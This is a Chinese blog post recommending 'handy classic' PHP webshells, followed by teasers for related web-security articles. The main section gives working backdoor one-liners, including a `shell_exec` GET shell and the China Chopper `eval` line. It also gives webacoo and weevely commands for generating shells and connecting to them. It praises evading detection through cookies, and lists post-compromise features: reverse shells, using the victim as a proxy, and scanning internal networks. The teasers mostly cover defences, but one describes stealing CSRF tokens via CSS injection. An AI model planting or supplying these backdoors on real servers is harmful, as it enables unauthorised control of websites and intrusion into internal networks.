几种好用的经典webshell(php)

更新日期: 2019-02-03阅读: 5k标签: 安全

webshell就是以网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 

顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具


php经典一句话: 

<?php echo shell_exec($_GET[‘cmd‘]);?>


中国菜刀:
官网:www.maicaidao.co
原理:上传一句话(<?php @eval($_POST[‘我是密码‘]);?>)至服务器端,再用中国菜刀客户端(图形化界面)去连接服务器

 

webacoo(kali):
特点:传输的数据包裹在cookie中,并非http包体内,起到一定绕过作用
原理:生成webshell,上传至目标服务器,再拿webacoo去连接该webshell,返回可以执行系统命令的shell
缺点:不可设置专属连接密码
生成webshell: webacoo -g -o a.php
连接webshell: webacoo -t -u http://192.168.1.1/a.php

 

weevely(kali):
原理:生成webshell,上传至目标服务器,再拿weevely去连接该webshell,返回可以执行系统命令的shell
生成webshell:weevely generate 密码 a.php
连接webshell:weevely http://192.168.1.1/a.php 密码
特点:连接到目标服务器webshell后还可以调用内置的N多模块,在shell下输入help查看模块,直接在shell下输入模块名称使用模块

30多个管理模块举例:
1、执行系统命令、浏览文件系统
2、检查服务器常见配置错误
3、创建正向、反向TCP Shell连接
4、将目标服务器作为代理http服务器(肉鸡) ====>只需要在连接到的shell中输入net_proxy即可打开代理,此时会在本地监听127.0.0.1:8080,浏览器设置为该代理后所有流量将走目标服务器
5、从目标计算机运行端口扫描,渗透内网


链接: https://www.fly63.com/article/detial/1951

Web前端安全同样不可忽视,编写前端代码时保持安全意识

随着网络的普及,黑客进行网络攻击的手段越来也多,越来越复杂。前端的HTML、JavaScript、CSS、Flash等技术变成了前端攻击者和开发者的战场,网站安全问题也开始向前端倾斜。

AJAX请求真的不安全么?谈谈Web安全与AJAX的关系。

AJAX请求真的不安全么?AJAX请求哪里不安全?怎么样让AJAX请求更安全?本文包含的内容较多,包括AJAX,CORS,XSS,CSRF等内容,要完整的看完并理解需要付出一定的时间。

第三方 CSS 并不安全

第三方内容在其沙箱区域内具有强大的能力。如果你担心恶意用户诱使你的网站加载第三方资源,可以通过 CSP 用作防护手段,其可以限制加载图片,脚本和样式的来源。

WEB应用程序安全检查列表

检查页面隐藏或丢失的内容:检查webserver元数据文件,如:robots.txt, sitemap.xml,.DS_Store, .htaccess,检查搜索功能可能的注入或攻击方式,检查不同agent代理访问网站显示内容的是否一致

利用CSS注入(无iFrames)窃取CSRF令牌

要做到无iFrame,我将使用一种类似于之前我讨论过的方法:我将创建一个弹窗,然后在设置计时器后更改弹出窗口的位置。使用这种方法,我仍然可以加载受害者的CSS,但我不再依赖于受害者是否允许iFrame。

30 分钟理解 CORB 是什么

我当前的 chrome 版本是 v68,如果是 v66 或更低版本可能提示的警告信息略有不同。印象中只对 CORS 比较熟悉,CORB 是个什么鬼?好奇心迫使我想要了解一下它到底是什么,于是暂时把手头工作放下查了一些资料并花时间汇总了一下,就有了这篇文章

谈 target=‘_blank’的安全问题

大家都喜欢target=_blank, 因为新页面打开不影响原来的页面。但是这个存在安全问题, 由target=_blank打开的页面, 可以通过window.opener访问原来的窗口。遍可以简单的将网页导航到其他网站, 这就存在很多的安全隐患了, 比如钓鱼,这种问题解决起来也很简单, 在链接中加入rel=noreferrer noopener属性就可以了

Web安全测试检查单

Web安全测试检查单。上传功能:绕过文件上传检查功能,上传文件大小和次数限制。注册功能:注册请求是否安全传输,注册时密码复杂度是否后台检验,激活链接测试

一些安全相关的HTTP header

HTTP Strict-Transport-Security,简称为HSTS。X-Frame-Options:是否允许一个页面可在<frame>、<iframe>、<object>中展现的标记。X-XSS-Protection作用:防范XSS攻击。

第三方CSS安全吗?

第三方内容在其沙箱中具有很高的影响力。 虽然图像或沙盒iframe有着非常小的沙箱,但脚本和样式的作用范围却影响你的整个页面,甚至是整个站点。如果你担心用户会欺骗你的网站去加载第三方资源,可以使用CSP(内容安全策略)保证安全

点击更多...

内容以共享、参考、研究为目的,不存在任何商业目的。其版权属原作者所有,如有侵权或违规,请与小编联系!情况属实本人将予以删除!